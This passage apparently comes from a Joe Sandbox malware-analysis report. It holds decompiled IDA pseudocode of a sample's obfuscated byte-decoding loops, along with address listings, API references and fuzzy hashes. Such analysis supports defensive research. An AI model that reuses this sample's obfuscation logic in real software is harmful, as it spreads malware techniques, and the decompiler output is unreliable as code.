                                                                                                                                                                                                                                                                            						_t540 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t118 =  &(_t540[0xc]); // 0x0
                                                                                                                                                                                                                                                                            						_t874 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t874[0xc] =  *_t118 + _a16[0x23];
                                                                                                                                                                                                                                                                            						_t894 =  *0x40d40c; // 0x658f6
                                                                                                                                                                                                                                                                            						_a16[0x43] = _a16[0x43] - (_t894 ^ _a16[0x2e]) - 0x658f6;
                                                                                                                                                                                                                                                                            						_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t742 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					_t133 =  &(_t742[0x20]); // 0x0
                                                                                                                                                                                                                                                                            					__eflags =  *0x0040D414 -  *_t133;
                                                                                                                                                                                                                                                                            					if( *0x0040D414 !=  *_t133) {
                                                                                                                                                                                                                                                                            						_t569 =  *((intOrPtr*)(0x40d414)) - 0x4924925a;
                                                                                                                                                                                                                                                                            						__eflags = _t569;
                                                                                                                                                                                                                                                                            						 *0x40d424 = _t569;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t673 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t135 =  &(_t673[0xc]); // 0x0
                                                                                                                                                                                                                                                                            						_t674 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t674[0xc] =  *_t135 ^ _a16[0x19];
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_a16[0x2a] = 0x3cc000;
                                                                                                                                                                                                                                                                            					_v32 = _v32 ^ 0x000003de;
                                                                                                                                                                                                                                                                            					_v20 = 0;
                                                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                                                            						__eflags = _v20 - 0x10254;
                                                                                                                                                                                                                                                                            						if(_v20 >= 0x10254) {
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t790 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t147 =  &(_t790[0x2a]); // 0x38d418
                                                                                                                                                                                                                                                                            						_v24 =  *((intOrPtr*)( *_t147 + _v20 * 4));
                                                                                                                                                                                                                                                                            						 *_a16 =  *_a16 -  *0x00FBB051 - 0x1fb9fd;
                                                                                                                                                                                                                                                                            						_a16[0xa] = _a16[0xa] + _a16[0x2e];
                                                                                                                                                                                                                                                                            						_v24 = _v24 * _a16[0x1f];
                                                                                                                                                                                                                                                                            						_t470 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t169 =  &(_t470[0x27]); // 0x4b18c
                                                                                                                                                                                                                                                                            						 *((char*)(_a16[0x33] +  *_t169)) = _v24 >> 8;
                                                                                                                                                                                                                                                                            						_t636 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t173 =  &(_t636[0x27]); // 0x4b18c
                                                                                                                                                                                                                                                                            						_t473 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t473[0x27] =  *_t173 + 1;
                                                                                                                                                                                                                                                                            						_t801 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t639 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t177 =  &(_t639[0xc]); // 0x0
                                                                                                                                                                                                                                                                            						_t181 = _a16[0x38] + 0x6e28ee78; // 0x6e28ee78
                                                                                                                                                                                                                                                                            						_a16[0x38] = _t801[0x2eb6f9] +  *_t177 + _t181;
                                                                                                                                                                                                                                                                            						_t888 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t187 =  &(_t888[0x32]); // 0x38f7708d
                                                                                                                                                                                                                                                                            						_a16[0x43] = _a16[5] -  *_t187 + 0x38f7708c ^ _a16[0x43];
                                                                                                                                                                                                                                                                            						_t809 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t649 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t649[0x2e] =  *0x00FBAF8D + 0x6e28ee78 ^ _t809[0x2e];
                                                                                                                                                                                                                                                                            						 *0x40d488 = _a16[0x43] ^ 0x0010bc9d |  *0x40d488;
                                                                                                                                                                                                                                                                            						_t486 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t202 =  &(_t486[0x27]); // 0x4b18c
                                                                                                                                                                                                                                                                            						_t815 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t203 =  &(_t815[0x33]); // 0x1212000
                                                                                                                                                                                                                                                                            						 *((char*)( *_t203 +  *_t202)) = _v24;
                                                                                                                                                                                                                                                                            						_t488 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t206 =  &(_t488[0x27]); // 0x4b18c
                                                                                                                                                                                                                                                                            						_t817 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t817[0x27] =  *_t206 + 1;
                                                                                                                                                                                                                                                                            						_t655 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t211 =  &(_t655[0x26]); // 0x0
                                                                                                                                                                                                                                                                            						_a16[0x23] = _a16[0x23] +  *_t211;
                                                                                                                                                                                                                                                                            						_t821 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t659 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t659[0x39] = _t821[0x39] +  *0x40d440;
                                                                                                                                                                                                                                                                            						_t662 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t497 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t497[0x2b] = _a16[0x1b] - 0x00000011 | _t662[0x2b];
                                                                                                                                                                                                                                                                            						_a16[0xa] = (_a16[0x43] - 0x10bc9c) * _a16[0xa];
                                                                                                                                                                                                                                                                            						_t831 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						 *0x0040D460 = (( *_t831 ^ _a16[0x34]) - 0x1ec649) *  *0x0040D460;
                                                                                                                                                                                                                                                                            						_t672 = _v20 + 1;
                                                                                                                                                                                                                                                                            						__eflags = _t672;
                                                                                                                                                                                                                                                                            						_v20 = _t672;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t570 = _a16;
                                                                                                                                                                                                                                                                            					__eflags =  *((intOrPtr*)(_t570 + 0xac)) - 0xb442;
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t570 + 0xac)) != 0xb442) {
                                                                                                                                                                                                                                                                            						_t624 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t245 =  &(_t624[0xc]); // 0x0
                                                                                                                                                                                                                                                                            						__eflags = 4;
                                                                                                                                                                                                                                                                            						_a16[0x1f] = (_a16[0x2eb6ec] ^  *_t245) + 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t747 = _a16;
                                                                                                                                                                                                                                                                            					_t887 = _a16;
                                                                                                                                                                                                                                                                            					__eflags =  *((intOrPtr*)(_t747 + 0xbadbe5)) -  *((intOrPtr*)(_t887 + 0x14));
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t747 + 0xbadbe5)) <=  *((intOrPtr*)(_t887 + 0x14))) {
                                                                                                                                                                                                                                                                            						_t748 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t258 =  &(_t748[0xc]); // 0x0
                                                                                                                                                                                                                                                                            						_t576 = _a16[0x48] - 0x00000630 ^  *_t258;
                                                                                                                                                                                                                                                                            						__eflags = _t576;
                                                                                                                                                                                                                                                                            						_t423 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t423[0xc] = _t576;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_a16[0x2a] = 0x3906c8;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v28 = 0;
                                                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                                                            						__eflags = _v28 - 0xc06;
                                                                                                                                                                                                                                                                            						if(_v28 >= 0xc06) {
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t424 =  *0x40d450; // 0x38d418
                                                                                                                                                                                                                                                                            						_v8 =  *((intOrPtr*)(_t424 + _v28 * 4));
                                                                                                                                                                                                                                                                            						_t578 =  *0x40d49c; // 0x0
                                                                                                                                                                                                                                                                            						_t751 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t427 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t427[0x39] = (_t578 + 1) * _t751[0x39];
                                                                                                                                                                                                                                                                            						_v8 = _v8 * _a16[0x1f];
                                                                                                                                                                                                                                                                            						 *((char*)(_a16[0x33] + _a16[0x27])) = _v8 >> 0x18;
                                                                                                                                                                                                                                                                            						_a16[0x27] = _a16[0x27] + 1;
                                                                                                                                                                                                                                                                            						_t433 =  *0x40d444; // 0x4b18c
                                                                                                                                                                                                                                                                            						 *((char*)(_a16[0x33] + _t433)) = _v8 >> 0x10;
                                                                                                                                                                                                                                                                            						_t587 =  *0x40d444; // 0x4b18c
                                                                                                                                                                                                                                                                            						 *0x40d444 = _t587 + 1;
                                                                                                                                                                                                                                                                            						_a16[0x32] = ( *((intOrPtr*)(0x40d434)) + 1) * _a16[0x32];
                                                                                                                                                                                                                                                                            						_a16[0x2d] =  *0x0040D3F4 ^ _a16[0x17] ^ 0x00000001 ^ _a16[0x2d];
                                                                                                                                                                                                                                                                            						_t764 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t305 =  &(_t764[0x33]); // 0x1212000
                                                                                                                                                                                                                                                                            						 *((char*)( *_t305 + _a16[0x27])) = _v8 >> 8;
                                                                                                                                                                                                                                                                            						_a16[0x27] = _a16[0x27] + 1;
                                                                                                                                                                                                                                                                            						_a16[0x48] = (_a16[0x19] ^ _a16[0x2eb6f9]) + _a16[0x48] + 0x6e2eb682;
                                                                                                                                                                                                                                                                            						 *0x0040D3F4 =  *0x0040D3F4 -  *0x0040D3F4;
                                                                                                                                                                                                                                                                            						_t608 =  *0x40d474; // 0x1212000
                                                                                                                                                                                                                                                                            						 *((char*)(_t608 +  *0x40d444)) = _v8;
                                                                                                                                                                                                                                                                            						_t446 =  *0x40d444; // 0x4b18c
                                                                                                                                                                                                                                                                            						 *0x40d444 = _t446 + 1;
                                                                                                                                                                                                                                                                            						 *_a16 = (_a16[0xa] + _a16[0x2eb70c] - 0x17216e) *  *_a16;
                                                                                                                                                                                                                                                                            						_t778 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_a16[0x2eb6f9] = _a16[0x2eb6f9] + _t778[0x13];
                                                                                                                                                                                                                                                                            						_t781 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t782 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t458 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t458[0x39] = _t781[0x39] + _t782[0x13];
                                                                                                                                                                                                                                                                            						_t623 = _v28 + 1;
                                                                                                                                                                                                                                                                            						__eflags = _t623;
                                                                                                                                                                                                                                                                            						_v28 = _t623;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v52;
                                                                                                                                                                                                                                                                            			}























































































                                                                                                                                                                                                                                                                            0x00371430
                                                                                                                                                                                                                                                                            0x00371439
                                                                                                                                                                                                                                                                            0x00371445
                                                                                                                                                                                                                                                                            0x00371450
                                                                                                                                                                                                                                                                            0x0037145c
                                                                                                                                                                                                                                                                            0x00371462
                                                                                                                                                                                                                                                                            0x00371470
                                                                                                                                                                                                                                                                            0x00371dbc
                                                                                                                                                                                                                                                                            0x00371dc0
                                                                                                                                                                                                                                                                            0x00371ebd
                                                                                                                                                                                                                                                                            0x00371ebd
                                                                                                                                                                                                                                                                            0x00371ec0
                                                                                                                                                                                                                                                                            0x00371dc6
                                                                                                                                                                                                                                                                            0x00371dce
                                                                                                                                                                                                                                                                            0x00371de2
                                                                                                                                                                                                                                                                            0x00371de9
                                                                                                                                                                                                                                                                            0x00371def
                                                                                                                                                                                                                                                                            0x00371df6
                                                                                                                                                                                                                                                                            0x00371e01
                                                                                                                                                                                                                                                                            0x00371e0d
                                                                                                                                                                                                                                                                            0x00371e3e
                                                                                                                                                                                                                                                                            0x00371e55
                                                                                                                                                                                                                                                                            0x00371e5b
                                                                                                                                                                                                                                                                            0x00371e68
                                                                                                                                                                                                                                                                            0x00371e6e
                                                                                                                                                                                                                                                                            0x00371e87
                                                                                                                                                                                                                                                                            0x00371e8d
                                                                                                                                                                                                                                                                            0x00371ea6
                                                                                                                                                                                                                                                                            0x00371ea9
                                                                                                                                                                                                                                                                            0x00371eaf
                                                                                                                                                                                                                                                                            0x00371eaf
                                                                                                                                                                                                                                                                            0x00371eb5
                                                                                                                                                                                                                                                                            0x00371476
                                                                                                                                                                                                                                                                            0x00371492
                                                                                                                                                                                                                                                                            0x003714d4
                                                                                                                                                                                                                                                                            0x00371494
                                                                                                                                                                                                                                                                            0x003714b8
                                                                                                                                                                                                                                                                            0x003714bd
                                                                                                                                                                                                                                                                            0x003714c3
                                                                                                                                                                                                                                                                            0x003714c9
                                                                                                                                                                                                                                                                            0x003714c9
                                                                                                                                                                                                                                                                            0x003714de
                                                                                                                                                                                                                                                                            0x003714f0
                                                                                                                                                                                                                                                                            0x00371505
                                                                                                                                                                                                                                                                            0x00371512
                                                                                                                                                                                                                                                                            0x00371517
                                                                                                                                                                                                                                                                            0x0037151a
                                                                                                                                                                                                                                                                            0x00371520
                                                                                                                                                                                                                                                                            0x0037152d
                                                                                                                                                                                                                                                                            0x00371537
                                                                                                                                                                                                                                                                            0x00371551
                                                                                                                                                                                                                                                                            0x00371566
                                                                                                                                                                                                                                                                            0x00371573
                                                                                                                                                                                                                                                                            0x0037157c
                                                                                                                                                                                                                                                                            0x00371582
                                                                                                                                                                                                                                                                            0x00371591
                                                                                                                                                                                                                                                                            0x00371594
                                                                                                                                                                                                                                                                            0x0037159a
                                                                                                                                                                                                                                                                            0x003715a3
                                                                                                                                                                                                                                                                            0x003715a9
                                                                                                                                                                                                                                                                            0x003715c7
                                                                                                                                                                                                                                                                            0x003715d9
                                                                                                                                                                                                                                                                            0x003715f2
                                                                                                                                                                                                                                                                            0x003715ff
                                                                                                                                                                                                                                                                            0x0037161d
                                                                                                                                                                                                                                                                            0x00371636
                                                                                                                                                                                                                                                                            0x00371651
                                                                                                                                                                                                                                                                            0x0037165f
                                                                                                                                                                                                                                                                            0x00371668
                                                                                                                                                                                                                                                                            0x00371675
                                                                                                                                                                                                                                                                            0x0037167b
                                                                                                                                                                                                                                                                            0x003716ab
                                                                                                                                                                                                                                                                            0x003716bb
                                                                                                                                                                                                                                                                            0x003716c3
                                                                                                                                                                                                                                                                            0x003716d5
                                                                                                                                                                                                                                                                            0x00371702
                                                                                                                                                                                                                                                                            0x00371709
                                                                                                                                                                                                                                                                            0x00371716
                                                                                                                                                                                                                                                                            0x0037171b
                                                                                                                                                                                                                                                                            0x00371728
                                                                                                                                                                                                                                                                            0x0037172e
                                                                                                                                                                                                                                                                            0x00371744
                                                                                                                                                                                                                                                                            0x0037176e
                                                                                                                                                                                                                                                                            0x003714ed
                                                                                                                                                                                                                                                                            0x003714ed
                                                                                                                                                                                                                                                                            0x00371782
                                                                                                                                                                                                                                                                            0x0037178e
                                                                                                                                                                                                                                                                            0x0037178e
                                                                                                                                                                                                                                                                            0x00371794
                                                                                                                                                                                                                                                                            0x003717be
                                                                                                                                                                                                                                                                            0x003717be
                                                                                                                                                                                                                                                                            0x003717c4
                                                                                                                                                                                                                                                                            0x00371796
                                                                                                                                                                                                                                                                            0x00371796
                                                                                                                                                                                                                                                                            0x0037179f
                                                                                                                                                                                                                                                                            0x003717a5
                                                                                                                                                                                                                                                                            0x003717ab
                                                                                                                                                                                                                                                                            0x003717ab
                                                                                                                                                                                                                                                                            0x003717cd
                                                                                                                                                                                                                                                                            0x003717df
                                                                                                                                                                                                                                                                            0x003717e2
                                                                                                                                                                                                                                                                            0x003717f4
                                                                                                                                                                                                                                                                            0x003717f4
                                                                                                                                                                                                                                                                            0x003717fb
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00371801
                                                                                                                                                                                                                                                                            0x00371807
                                                                                                                                                                                                                                                                            0x00371813
                                                                                                                                                                                                                                                                            0x00371833
                                                                                                                                                                                                                                                                            0x00371861
                                                                                                                                                                                                                                                                            0x0037186f
                                                                                                                                                                                                                                                                            0x00371878
                                                                                                                                                                                                                                                                            0x0037187d
                                                                                                                                                                                                                                                                            0x0037188c
                                                                                                                                                                                                                                                                            0x0037188f
                                                                                                                                                                                                                                                                            0x00371895
                                                                                                                                                                                                                                                                            0x0037189e
                                                                                                                                                                                                                                                                            0x003718a3
                                                                                                                                                                                                                                                                            0x003718b0
                                                                                                                                                                                                                                                                            0x003718ba
                                                                                                                                                                                                                                                                            0x003718c0
                                                                                                                                                                                                                                                                            0x003718cc
                                                                                                                                                                                                                                                                            0x003718d6
                                                                                                                                                                                                                                                                            0x003718ef
                                                                                                                                                                                                                                                                            0x003718f9
                                                                                                                                                                                                                                                                            0x0037191a
                                                                                                                                                                                                                                                                            0x0037193b
                                                                                                                                                                                                                                                                            0x00371950
                                                                                                                                                                                                                                                                            0x00371956
                                                                                                                                                                                                                                                                            0x0037197b
                                                                                                                                                                                                                                                                            0x00371981
                                                                                                                                                                                                                                                                            0x00371986
                                                                                                                                                                                                                                                                            0x0037198c
                                                                                                                                                                                                                                                                            0x00371992
                                                                                                                                                                                                                                                                            0x0037199b
                                                                                                                                                                                                                                                                            0x0037199e
                                                                                                                                                                                                                                                                            0x003719a3
                                                                                                                                                                                                                                                                            0x003719ac
                                                                                                                                                                                                                                                                            0x003719b2
                                                                                                                                                                                                                                                                            0x003719ca
                                                                                                                                                                                                                                                                            0x003719d0
                                                                                                                                                                                                                                                                            0x003719e1
                                                                                                                                                                                                                                                                            0x003719f0
                                                                                                                                                                                                                                                                            0x00371a0b
                                                                                                                                                                                                                                                                            0x00371a11
                                                                                                                                                                                                                                                                            0x00371a32
                                                                                                                                                                                                                                                                            0x00371a47
                                                                                                                                                                                                                                                                            0x00371a4c
                                                                                                                                                                                                                                                                            0x00371a86
                                                                                                                                                                                                                                                                            0x00371a92
                                                                                                                                                                                                                                                                            0x00371ab8
                                                                                                                                                                                                                                                                            0x003717ee
                                                                                                                                                                                                                                                                            0x003717ee
                                                                                                                                                                                                                                                                            0x003717f1
                                                                                                                                                                                                                                                                            0x003717f1
                                                                                                                                                                                                                                                                            0x00371acb
                                                                                                                                                                                                                                                                            0x00371ace
                                                                                                                                                                                                                                                                            0x00371ad9
                                                                                                                                                                                                                                                                            0x00371ae5
                                                                                                                                                                                                                                                                            0x00371aef
                                                                                                                                                                                                                                                                            0x00371af2
                                                                                                                                                                                                                                                                            0x00371af8
                                                                                                                                                                                                                                                                            0x00371af8
                                                                                                                                                                                                                                                                            0x00371b0a
                                                                                                                                                                                                                                                                            0x00371b0d
                                                                                                                                                                                                                                                                            0x00371b14
                                                                                                                                                                                                                                                                            0x00371b18
                                                                                                                                                                                                                                                                            0x00371b38
                                                                                                                                                                                                                                                                            0x00371b3e
                                                                                                                                                                                                                                                                            0x00371b3e
                                                                                                                                                                                                                                                                            0x00371b3e
                                                                                                                                                                                                                                                                            0x00371b41
                                                                                                                                                                                                                                                                            0x00371b46
                                                                                                                                                                                                                                                                            0x00371b1a
                                                                                                                                                                                                                                                                            0x00371b1d
                                                                                                                                                                                                                                                                            0x00371b1d
                                                                                                                                                                                                                                                                            0x00371b49
                                                                                                                                                                                                                                                                            0x00371b5b
                                                                                                                                                                                                                                                                            0x00371b5b
                                                                                                                                                                                                                                                                            0x00371b62
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00371b6b
                                                                                                                                                                                                                                                                            0x00371b73
                                                                                                                                                                                                                                                                            0x00371b7e
                                                                                                                                                                                                                                                                            0x00371b87
                                                                                                                                                                                                                                                                            0x00371b9d
                                                                                                                                                                                                                                                                            0x00371ba2
                                                                                                                                                                                                                                                                            0x00371bb3
                                                                                                                                                                                                                                                                            0x00371bce
                                                                                                                                                                                                                                                                            0x00371be0
                                                                                                                                                                                                                                                                            0x00371bf5
                                                                                                                                                                                                                                                                            0x00371bfa
                                                                                                                                                                                                                                                                            0x00371bfd
                                                                                                                                                                                                                                                                            0x00371c06
                                                                                                                                                                                                                                                                            0x00371c2a
                                                                                                                                                                                                                                                                            0x00371c53
                                                                                                                                                                                                                                                                            0x00371c68
                                                                                                                                                                                                                                                                            0x00371c6e
                                                                                                                                                                                                                                                                            0x00371c74
                                                                                                                                                                                                                                                                            0x00371c86
                                                                                                                                                                                                                                                                            0x00371cb3
                                                                                                                                                                                                                                                                            0x00371cdd
                                                                                                                                                                                                                                                                            0x00371ce3
                                                                                                                                                                                                                                                                            0x00371cf2
                                                                                                                                                                                                                                                                            0x00371cf4
                                                                                                                                                                                                                                                                            0x00371cfc
                                                                                                                                                                                                                                                                            0x00371d32
                                                                                                                                                                                                                                                                            0x00371d4a
                                                                                                                                                                                                                                                                            0x00371d5e
                                                                                                                                                                                                                                                                            0x00371d72
                                                                                                                                                                                                                                                                            0x00371d7f
                                                                                                                                                                                                                                                                            0x00371d91
                                                                                                                                                                                                                                                                            0x00371d96
                                                                                                                                                                                                                                                                            0x00371b55
                                                                                                                                                                                                                                                                            0x00371b55
                                                                                                                                                                                                                                                                            0x00371b58
                                                                                                                                                                                                                                                                            0x00371b58
                                                                                                                                                                                                                                                                            0x00371da2
                                                                                                                                                                                                                                                                            0x00371ecb

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00371DE9
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00371EAF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCurrentHandleProcess
                                                                                                                                                                                                                                                                            • String ID: (<$`79$((<
                                                                                                                                                                                                                                                                            • API String ID: 2391145178-626639064
                                                                                                                                                                                                                                                                            • Opcode ID: facecfff07ab2783472169d93f6dd980d1382dd19180e4a06aca917dd5208c2f
                                                                                                                                                                                                                                                                            • Instruction ID: 1955728232e0f1977c2be328cc2aba679a9157cab5e9828f64aa4e3c4168926f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: facecfff07ab2783472169d93f6dd980d1382dd19180e4a06aca917dd5208c2f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7621974A00106CFE708CF58D6D4FAAB7B2FB88304F549279D909AB796C634EC16CB95
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                                                                            			E00387550(signed int _a4, intOrPtr _a8, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				unsigned int _v12;
                                                                                                                                                                                                                                                                            				unsigned int _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                                                                                                                            				intOrPtr _t383;
                                                                                                                                                                                                                                                                            				intOrPtr _t386;
                                                                                                                                                                                                                                                                            				signed int _t389;
                                                                                                                                                                                                                                                                            				intOrPtr _t390;
                                                                                                                                                                                                                                                                            				signed int _t426;
                                                                                                                                                                                                                                                                            				intOrPtr _t427;
                                                                                                                                                                                                                                                                            				intOrPtr _t448;
                                                                                                                                                                                                                                                                            				intOrPtr _t455;
                                                                                                                                                                                                                                                                            				intOrPtr _t457;
                                                                                                                                                                                                                                                                            				intOrPtr _t467;
                                                                                                                                                                                                                                                                            				intOrPtr _t483;
                                                                                                                                                                                                                                                                            				signed int _t492;
                                                                                                                                                                                                                                                                            				intOrPtr _t495;
                                                                                                                                                                                                                                                                            				intOrPtr _t501;
                                                                                                                                                                                                                                                                            				intOrPtr _t527;
                                                                                                                                                                                                                                                                            				intOrPtr _t533;
                                                                                                                                                                                                                                                                            				signed int _t547;
                                                                                                                                                                                                                                                                            				intOrPtr _t562;
                                                                                                                                                                                                                                                                            				intOrPtr _t566;
                                                                                                                                                                                                                                                                            				intOrPtr _t567;
                                                                                                                                                                                                                                                                            				intOrPtr _t575;
                                                                                                                                                                                                                                                                            				intOrPtr _t577;
                                                                                                                                                                                                                                                                            				intOrPtr _t583;
                                                                                                                                                                                                                                                                            				intOrPtr _t592;
                                                                                                                                                                                                                                                                            				intOrPtr _t603;
                                                                                                                                                                                                                                                                            				intOrPtr _t604;
                                                                                                                                                                                                                                                                            				intOrPtr _t611;
                                                                                                                                                                                                                                                                            				intOrPtr _t615;
                                                                                                                                                                                                                                                                            				intOrPtr _t617;
                                                                                                                                                                                                                                                                            				intOrPtr _t620;
                                                                                                                                                                                                                                                                            				intOrPtr _t622;
                                                                                                                                                                                                                                                                            				intOrPtr _t626;
                                                                                                                                                                                                                                                                            				intOrPtr _t627;
                                                                                                                                                                                                                                                                            				intOrPtr _t632;
                                                                                                                                                                                                                                                                            				intOrPtr _t638;
                                                                                                                                                                                                                                                                            				intOrPtr _t654;
                                                                                                                                                                                                                                                                            				intOrPtr _t698;
                                                                                                                                                                                                                                                                            				intOrPtr _t702;
                                                                                                                                                                                                                                                                            				signed int _t718;
                                                                                                                                                                                                                                                                            				intOrPtr _t722;
                                                                                                                                                                                                                                                                            				intOrPtr _t729;
                                                                                                                                                                                                                                                                            				intOrPtr _t733;
                                                                                                                                                                                                                                                                            				signed int _t739;
                                                                                                                                                                                                                                                                            				intOrPtr _t742;
                                                                                                                                                                                                                                                                            				signed int _t767;
                                                                                                                                                                                                                                                                            				intOrPtr _t768;
                                                                                                                                                                                                                                                                            				intOrPtr _t789;
                                                                                                                                                                                                                                                                            				intOrPtr _t811;
                                                                                                                                                                                                                                                                            				intOrPtr _t812;
                                                                                                                                                                                                                                                                            				intOrPtr _t813;
                                                                                                                                                                                                                                                                            				intOrPtr _t815;
                                                                                                                                                                                                                                                                            				intOrPtr* _t837;
                                                                                                                                                                                                                                                                            				intOrPtr _t842;
                                                                                                                                                                                                                                                                            				intOrPtr* _t843;
                                                                                                                                                                                                                                                                            				intOrPtr _t844;
                                                                                                                                                                                                                                                                            				intOrPtr _t849;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = _a8 + 0xef;
                                                                                                                                                                                                                                                                            				_v48 = _a4 + 0x3f;
                                                                                                                                                                                                                                                                            				_v76 = _a8 - 0x2598;
                                                                                                                                                                                                                                                                            				_v32 = _a24 + 0xc3;
                                                                                                                                                                                                                                                                            				_v40 = _a4 ^ 0x00000240;
                                                                                                                                                                                                                                                                            				_v72 = _a8 + 0x1fe;
                                                                                                                                                                                                                                                                            				_v36 = _a4 - 0x24c7;
                                                                                                                                                                                                                                                                            				if(_v8 < _v36 + 0x2565) {
                                                                                                                                                                                                                                                                            					_t383 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            					_t842 =  *0x40d4cc; // 0x40d3a8
